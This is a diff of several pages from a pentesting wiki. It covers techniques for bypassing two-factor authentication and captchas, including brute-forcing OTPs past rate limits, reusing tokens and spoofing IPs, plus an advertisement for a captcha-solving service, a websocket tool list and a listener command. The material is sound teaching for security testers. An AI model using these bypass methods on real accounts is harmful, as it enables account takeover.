# 2FA/OTP Bypass
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## **Bypassing two-factor authentication**
|
||||||
|
|
||||||
# **Bypassing two-factor authentication**
|
### **Direct bypass**
|
||||||
|
|
||||||
## **Direct bypass**
|
|
||||||
|
|
||||||
To bypass 2FA, just **try to access the next endpoint directly** (you need to know the path of the next endpoint). If this doesn't work, try to change the **Referrer header** as if you came from the 2FA page.
|
To bypass 2FA, just **try to access the next endpoint directly** (you need to know the path of the next endpoint). If this doesn't work, try to change the **Referrer header** as if you came from the 2FA page.
|
||||||
|
|
||||||
## **Reusing token**
|
### **Reusing token**
|
||||||
|
|
||||||
Maybe you can reuse a previously used token inside the account to authenticate.
|
Maybe you can reuse a previously used token inside the account to authenticate.
|
||||||
|
|
||||||
## Sharing unused tokens
|
### Sharing unused tokens
|
||||||
|
|
||||||
Check if you can get the token from your account and try to use it to bypass the 2FA in a different account.
|
Check if you can get the token from your account and try to use it to bypass the 2FA in a different account.
|
||||||
|
|
||||||
## Leaked Token
|
### Leaked Token
|
||||||
|
|
||||||
Is the token leaked on a response from the web application?
|
Is the token leaked on a response from the web application?
|
||||||
|
|
||||||
## Session permission
|
### Email verification link
|
||||||
|
|
||||||
|
Try to use the **email verification link received when the account was created** to see if even if the 2FA was set you can still access your profile just with that link ([post](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)).
|
||||||
|
|
||||||
|
### Session permission
|
||||||
|
|
||||||
Using the same session start the flow using your account and the victim's account. When reaching the 2FA point on both accounts, complete the 2FA with your account but do not access the next part. Instead of that, try to access the next step with the victim's account flow. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
|
Using the same session start the flow using your account and the victim's account. When reaching the 2FA point on both accounts, complete the 2FA with your account but do not access the next part. Instead of that, try to access the next step with the victim's account flow. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
|
||||||
|
|
||||||
## **Password reset function**
|
### **Password reset function**
|
||||||
|
|
||||||
In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.\
|
In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.\
|
||||||
Check if a **mail **is sent with a **link **to **reset the password** and if you can **reuse** that **link **to reset the password as **many times as you want** (even if the victim changes his email address).
|
Check if a **mail** is sent with a **link** to **reset the password** and if you can **reuse** that **link** to reset the password as **many times as you want** (even if the victim changes his email address).
|
||||||
|
|
||||||
## OAuth
|
### OAuth
|
||||||
|
|
||||||
If you can compromise the account of the user in a trusted **OAuth** platform (Google, Facebook...)
|
If you can compromise the account of the user in a trusted **OAuth** platform (Google, Facebook...)
|
||||||
|
|
||||||
## Brute force
|
### Brute force
|
||||||
|
|
||||||
### Lack of Rate limit
|
#### Lack of Rate limit
|
||||||
|
|
||||||
Is there any limit on the number of codes that you can try, so you can just brute force it? Be careful with a possible "silent" rate limit, always try several codes and then the real one to confirm the vulnerability.
|
Is there any limit on the number of codes that you can try, so you can just brute force it? Be careful with a possible "silent" rate limit, always try several codes and then the real one to confirm the vulnerability.
|
||||||
|
|
||||||
### Flow rate limit but no rate limit
|
#### Flow rate limit but no rate limit
|
||||||
|
|
||||||
In this case, there is a flow rate limit (you have to brute force it very slowly: 1 thread and some sleep before 2 tries) but no rate limit. So with enough time, you can be able to find the valid code.
|
In this case, there is a flow rate limit (you have to brute force it very slowly: 1 thread and some sleep before 2 tries) but no rate limit. So with enough time, you can be able to find the valid code.
|
||||||
|
|
||||||
### Re-send code and reset the limit
|
#### Re-send code and reset the limit
|
||||||
|
|
||||||
There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
|
There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
|
||||||
|
|
||||||
### Client side rate limit bypass
|
#### Client side rate limit bypass
|
||||||
|
|
||||||
{% content-ref url="rate-limit-bypass.md" %}
|
{% content-ref url="rate-limit-bypass.md" %}
|
||||||
[rate-limit-bypass.md](rate-limit-bypass.md)
|
[rate-limit-bypass.md](rate-limit-bypass.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Lack of rate limit in the user's account
|
#### Lack of rate limit in the user's account
|
||||||
|
|
||||||
Sometimes you can configure the 2FA for some actions inside your account (change mail, password...). However, even in cases where there is a rate limit when you tried to log in, there isn't any rate limit to protect actions inside the account.
|
Sometimes you can configure the 2FA for some actions inside your account (change mail, password...). However, even in cases where there is a rate limit when you tried to log in, there isn't any rate limit to protect actions inside the account.
|
||||||
|
|
||||||
### Lack of rate limit re-sending the code via SMS
|
#### Lack of rate limit re-sending the code via SMS
|
||||||
|
|
||||||
You won't be able to bypass the 2FA but you will be able to waste the company's money.
|
You won't be able to bypass the 2FA but you will be able to waste the company's money.
|
||||||
|
|
||||||
### Infinite OTP regeneration
|
#### Infinite OTP regeneration
|
||||||
|
|
||||||
If you can **generate a new OTP infinite times**, the** OTP is simple enough** (4 numbers), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
|
If you can **generate a new OTP infinite times**, the OTP is **simple enough** (4 numbers), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
|
||||||
|
|
||||||
## CSRF/Clickjacking
|
### CSRF/Clickjacking
|
||||||
|
|
||||||
Check if there is a Cross Site Request Forgery (CSRF) or a Clickjacking vulnerability to disable the 2FA.
|
Check if there is a Cross Site Request Forgery (CSRF) or a Clickjacking vulnerability to disable the 2FA.
|
||||||
|
|
||||||
## Remember me functionality
|
### Remember me functionality
|
||||||
|
|
||||||
### Guessable cookie
|
#### Guessable cookie
|
||||||
|
|
||||||
If the "remember me" functionality uses a new cookie with a guessable code, try to guess it.
|
If the "remember me" functionality uses a new cookie with a guessable code, try to guess it.
|
||||||
|
|
||||||
### IP address
|
#### IP address
|
||||||
|
|
||||||
If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
|
If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
|
||||||
|
|
||||||
## Older versions
|
### Older versions
|
||||||
|
|
||||||
### Subdomains
|
#### Subdomains
|
||||||
|
|
||||||
If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA (so it is directly bypassed) or those endpoints could support a vulnerable version of the 2FA.
|
If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA (so it is directly bypassed) or those endpoints could support a vulnerable version of the 2FA.
|
||||||
|
|
||||||
### APIs
|
#### APIs
|
||||||
|
|
||||||
If you find that the 2FA is using an API located under a /v\*/ directory (like "/v3/"), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
|
If you find that the 2FA is using an API located under a /v\*/ directory (like "/v3/"), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
|
||||||
|
|
||||||
## Previous sessions
|
### Previous sessions
|
||||||
|
|
||||||
When the 2FA is enabled, previous sessions created should be ended. This is because when a client has his account compromised he could want to protect it by activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
|
When the 2FA is enabled, previous sessions created should be ended. This is because when a client has his account compromised he could want to protect it by activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
|
||||||
|
|
||||||
## Improper access control to backup codes
|
### Improper access control to backup codes
|
||||||
|
|
||||||
Backup codes are generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged (static codes). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
|
Backup codes are generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged (static codes). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
|
||||||
|
|
||||||
## Information Disclosure
|
### Information Disclosure
|
||||||
|
|
||||||
If you notice some confidential information appear on the 2FA page that you didn't know previously (like the phone number), then this can be considered an information disclosure vulnerability.
|
If you notice some confidential information appear on the 2FA page that you didn't know previously (like the phone number), then this can be considered an information disclosure vulnerability.
|
||||||
|
|
||||||
## **Password-Reset == disable 2FA**
|
### **Password-Reset == disable 2FA**
|
||||||
|
|
||||||
1. Create an Account and Turn On 2FA.
|
1. Create an Account and Turn On 2FA.
|
||||||
2. Logout from that account.
|
2. Logout from that account.
|
||||||
|
@ -125,27 +124,20 @@ If you notice some confidential information appear on the 2FA page that you didn
|
||||||
5. Now try to log in.
|
5. Now try to log in.
|
||||||
6. If you are not asked to enter a 2FA code, You can report.
|
6. If you are not asked to enter a 2FA code, You can report.
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
{% embed url="https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35" %}
|
{% embed url="https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35" %}
|
||||||
|
|
||||||
{% embed url="https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718" %}
|
{% embed url="https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,23 +1,18 @@
|
||||||
|
# Captcha Bypass
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Captcha Bypass
|
||||||
# Captcha Bypass
|
|
||||||
|
|
||||||
To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Therefore, try to test for these things:
|
To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Therefore, try to test for these things:
|
||||||
|
|
||||||
|
@ -33,21 +28,24 @@ To **automate** the **testing** of some functions of the server that allows user
|
||||||
* If the captcha consists of **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
|
* If the captcha consists of **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
|
||||||
* Use an **OCR** ([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
|
* Use an **OCR** ([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
|
||||||
|
|
||||||
|
## Online Services to bypass captchas
|
||||||
|
|
||||||
|
### [Capsolver](https://www.capsolver.com/)
|
||||||
|
|
||||||
|
Capsolver‘s automatic captcha solver offers the **most affordable and quick captcha-solving solution**. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds.
|
||||||
|
|
||||||
|
With a success rate of 99.15%, Capsolver can **answer more than 10M captchas every minute**. This implies that your automation or scrape will have a 99.99% uptime. You may buy a captcha package if you have a large budget.
|
||||||
|
|
||||||
|
At the lowest price on the market, you may receive a variety of solutions, including reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, picture-to-text, binance / coinmarketcap captcha, geetest v3 / v3, and more. With this service, **0.1s is the slowest speed ever measured**.
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -476,7 +476,7 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
|
||||||
|
|
||||||
Trick from [**here**](https://ctftime.org/writeup/29310).
|
Trick from [**here**](https://ctftime.org/writeup/29310).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -611,7 +611,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -85,10 +85,22 @@ Once the client is trying to connect to you can then use:
|
||||||
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
|
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
|
||||||
```
|
```
|
||||||
|
|
||||||
## Websockets Enumeration
|
## Websockets enumeration
|
||||||
|
|
||||||
You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
|
You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
|
||||||
|
|
||||||
|
## Websocket Debug tools
|
||||||
|
|
||||||
|
* **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
|
||||||
|
* [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
|
||||||
|
* [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication. 
|
||||||
|
* [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
|
||||||
|
* [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**
|
||||||
|
|
||||||
|
## Websocket Lab
|
||||||
|
|
||||||
|
In [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) you have a code to launch a web using websockets and in [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) you can find an explanation.
|
||||||
|
|
||||||
## Cross-site WebSocket hijacking (CSWSH)
|
## Cross-site WebSocket hijacking (CSWSH)
|
||||||
|
|
||||||
Also known as _cross-origin WebSocket hijacking_.\
|
Also known as _cross-origin WebSocket hijacking_.\
|
||||||
|
